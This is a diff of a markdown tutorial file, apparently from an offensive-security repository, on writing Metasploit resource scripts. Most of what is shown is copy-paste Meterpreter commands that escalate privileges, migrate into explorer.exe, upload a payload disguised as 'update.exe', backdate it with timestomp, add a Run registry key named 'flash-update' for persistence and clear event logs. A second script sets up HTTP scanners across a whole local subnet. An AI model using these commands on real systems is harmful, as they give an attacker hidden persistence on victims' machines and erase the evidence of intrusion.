r00t-3xp10it/hacking-material-books/metasploit-RC[ERB]/metasploit_resource_files.md

  getprivs
  getsystem
  migrate -n explorer.exe
-  upload update.exe %temp%\\update.exe
+  upload /root/update.exe %temp%\\update.exe
   timestomp -z '3/10/1999 15:15:15' %temp%\\update.exe
   reg setval -k HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Run -v flash-update -d %temp%\\update.exe scheduleme -m 10 -c "%temp%\\update.exe"
  clearev
 ```
-**Run the script:** resource /root/persistence.rc
+**[meterpreter]::Run the script::** resource /root/persistence.rc

 <br /><br />

 <blockquote>In the next resource script all auxiliary modules require that RHOSTS and THREADS options are set before running the modules.
-In the next example we are using SETG (global variable declarations) to configurate all the options that we need before running the modules.
+In the next example we are using 'SETG' (global variable declarations) to configurate all the options that we need before running the modules.
 So its advice before writing a resource file like this one, to first check what options are required for the auxiliary to run.
-The next rc script will run 3 auxiliary modules againts all hosts found inside local lan.</blockquote>
+The next rc script will then run 3 auxiliary modules againts all hosts found inside local lan.</blockquote>

 Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: **http_brute.rc**
 ```
    setg THREADS 15
-   setg RHOSTS 192.168.1.254
+   setg RHOSTS 192.168.1.0/24
      use auxiliary/scanner/http/http_version
    run
      use auxiliary/scanner/http/dir_scanner